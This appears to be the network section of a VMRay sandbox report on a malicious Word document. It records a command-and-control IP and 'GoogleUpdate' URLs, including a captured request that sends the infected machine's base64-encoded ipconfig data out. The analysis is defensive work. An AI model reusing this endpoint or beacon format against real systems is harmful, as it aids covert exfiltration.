b22d7b19...e617 | Network

b22d7b19...e617 | Network

Try VMRay Analyzer

VTI SCORE: 100/100

Dynamic Analysis Report

Classification: -

b22d7b196ca03b43f9b140732a3d317f328e5d5f53379c2520a0f05a17d6e617 (SHA256)

CV gui PVN vv y kien cua UB ve gia han.doc

Word Document

Created at 2019-01-08 12:39:00

Hosts (1)

»

Hostname	IP Address	Location	Protocols	Reputation Status	WHOIS Data
154.16.37.122	154.16.37.122	-	HTTP, TCP	Unknown	Not Queried

URLs (2)

»

URL	Categories	Names	Source	HTTP Status Code	Reputation Status
http://154.16.37.122/GoogleUpdate/Update.php	-	-	PCAP	OK (200)	Unknown
http://154.16.37.122/GoogleUpdate/Google.php?Mac=VVVJRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCg0KNzQ1QUQwQUYtRDM0NS0yMUQ3LUYxQTMtMkY0NUI5NzI0QjFEICANCg0KDQoNCg==?Data=DQpXaW5kb3dzIElQIENvbmZpZ3VyYXRpb24NCg0KICAgSG9zdCBOYW1lIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIDogWUt5ZDY5cQ0KICAgUHJpbWFyeSBEbnMgU3VmZml4ICAuIC4gLiAuIC4gLiAuIDogDQogICBOb2RlIFR5cGUgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gOiBIeWJyaWQNCiAgIElQIFJvdXRpbmcgRW5hYmxlZC4gLiAuIC4gLiAuIC4gLiA6IE5vDQogICBXSU5TIFByb3h5IEVuYWJsZWQuIC4gLiAuIC4gLiAuIC4gOiBObw0KDQpFdGhlcm5ldCBhZGFwdGVyIExvY2FsIEFyZWEgQ29ubmVjdGlvbjoNCg0KICAgQ29ubmVjdGlvbi1zcGVjaWZpYyBETlMgU3VmZml4ICAuIDogDQogICBEZXNjcmlwdGlvbiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gOiBJbnRlbChSKSBQUk8vMTAwMCBNVCBOZXR3b3JrIENvbm5lY3Rpb24NCiAgIFBoeXNpY2FsIEFkZHJlc3MuIC4gLiAuIC4gLiAuIC4gLiA6IDAwLTFGLTUxLUY2LUIxLThDDQogICBESENQIEVuYWJsZWQuIC4gLiAuIC4gLiAuIC4gLiAuIC4gOiBZZXMNCiAgIEF1dG9jb25maWd1cmF0aW9uIEVuYWJsZWQgLiAuIC4gLiA6IFllcw0KICAgTGluay1sb2NhbCBJUHY2IEFkZHJlc3MgLiAuIC4gLiAuIDogZmU4MDo6ZDRhYTo2YjQzOmIyZTM6ZGIwMSUxMShQcmVmZXJyZWQpIA0KICAgSVB2NCBBZGRyZXNzLiAuIC4gLiAuIC4gLiAuIC4gLiAuIDogMTkyLjE2OC4wLjEwNShQcmVmZXJyZWQpIA0KICAgU3VibmV0IE1hc2sgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIDogMjU1LjI1NS4yNTUuMA0KICAgTGVhc2UgT2J0YWluZWQuIC4gLiAuIC4gLiAuIC4gLiAuIDogVHVlc2RheSwgSmFudWFyeSAwOCwgMjAxOSAxMjozOTo1NiBQTQ0KICAgTGVhc2UgRXhwaXJlcyAuIC4gLiAuIC4gLiAuIC4gLiAuIDogVHVlc2RheSwgSmFudWFyeSAwOCwgMjAxOSAxOjM5OjU1IFBNDQogICBEZWZhdWx0IEdhdGV3YXkgLiAuIC4gLiAuIC4gLiAuIC4gOiAxOTIuMTY4LjAuMQ0KICAgREhDUCBTZXJ2ZXIgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIDogMTkyLjE2OC4wLjENCiAgIERIQ1B2NiBJQUlEIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiA6IDIzNDkwNTY1Ng0KICAgREhDUHY2IENsaWVudCBEVUlELiAuIC4gLiAuIC4gLiAuIDogMDAtMDEtMDAtMDEtMjAtRTgtMkUtRjAtMDAtNjAtMzgtOUItQkEtMDENCiAgIEROUyBTZXJ2ZXJzIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiA6IDE5Mi4xNjguMC4xDQogICBOZXRCSU9TIG92ZXIgVGNwaXAuIC4gLiAuIC4gLiAuIC4gOiBFbmFibGVkDQoNClR1bm5lbCBhZGFwdGVyIGlzYXRhcC57NDhGRjdGNEYtQkUzQS00OTMwLUFBMDMtMkREQzA4QTQxODA2fToNCg0KICAgTWVkaWEgU3RhdGUgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIDogTWVkaWEgZGlzY29ubmVjdGVkDQogICBDb25uZWN0aW9uLXNwZWNpZmljIEROUyBTdWZmaXggIC4gOiANCiAgIERlc2NyaXB0aW9uIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiA6IE1pY3Jvc29mdCBJU0FUQVAgQWRhcHRlcg0KICAgUGh5c2ljYWwgQWRkcmVzcy4gLiAuIC4gLiAuIC4gLiAuIDogMDAtMDAtMDAtMDAtMDAtMDAtMDAtRTANCiAgIERIQ1AgRW5hYmxlZC4gLiAuIC4gLiAuIC4gLiAuIC4gLiA6IE5vDQogICBBdXRvY29uZmlndXJhdGlvbiBFbmFibGVkIC4gLiAuIC4gOiBZZXMNCg0KVHVubmVsIGFkYXB0ZXIgVGVyZWRvIFR1bm5lbGluZyBQc2V1ZG8tSW50ZXJmYWNlOg0KDQogICBNZWRpYSBTdGF0ZSAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gOiBNZWRpYSBkaXNjb25uZWN0ZWQNCiAgIENvbm5lY3Rpb24tc3BlY2lmaWMgRE5TIFN1ZmZpeCAgLiA6IA0KICAgRGVzY3JpcHRpb24gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIDogVGVyZWRvIFR1bm5lbGluZyBQc2V1ZG8tSW50ZXJmYWNlDQogICBQaHlzaWNhbCBBZGRyZXNzLiAuIC4gLiAuIC4gLiAuIC4gOiAwMC0wMC0wMC0wMC0wMC0wMC0wMC1FMA0KICAgREhDUCBFbmFibGVkLiAuIC4gLiAuIC4gLiAuIC4gLiAuIDogTm8NCiAgIEF1dG9jb25maWd1cmF0aW9uIEVuYWJsZWQgLiAuIC4gLiA6IFllcw0K	-	-	PCAP	OK (200)	Unknown

Connections

TCP Sessions (2)

»

Information	Value
Total Data Sent	3.51 KB
Total Data Received	0.94 KB
Contacted Host Count	1
Contacted Hosts	154.16.37.122

TCP Session #1

»

Information	Value
Source	PCAP
Stream ID	28
Remote Address	154.16.37.122
Remote Port	80
Local Address	192.168.0.105
Local Port	49186
Data Sent	0.36 KB
Data Received	0.43 KB

Time	Highest Layer	Additional Information	Success
206.703210 s	TCP	Data Sent: 0.06 KB, Data Received: 0.06 KB
206.729146 s	TCP	Data Sent: 0.05 KB, Data Received: 0.26 KB
206.765017 s	HTTP	Data Sent: 0.14 KB, Data Received: 0.05 KB
206.813723 s	TCP	Data Sent: 0.05 KB, Data Received: 0.00 KB
207.223279 s	TCP	Data Sent: 0.05 KB, Data Received: 0.05 KB

TCP Session #2

»

Information	Value
Source	PCAP
Stream ID	30
Remote Address	154.16.37.122
Remote Port	80
Local Address	192.168.0.105
Local Port	49188
Data Sent	3.15 KB
Data Received	0.51 KB

Time	Highest Layer	Additional Information	Success
211.115881 s	TCP	Data Sent: 0.06 KB, Data Received: 0.06 KB
211.143480 s	TCP	Data Sent: 0.05 KB, Data Received: 0.24 KB
211.143984 s	TCP	Data Sent: 1.48 KB, Data Received: 0.05 KB
211.143999 s	HTTP	Data Sent: 1.45 KB, Data Received: 0.05 KB
211.173207 s	TCP	Data Sent: 0.05 KB, Data Received: 0.05 KB
211.173945 s	TCP	Data Sent: 0.05 KB, Data Received: 0.05 KB

WHOIS Domain Information

Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".

Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".

After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".

Screenshot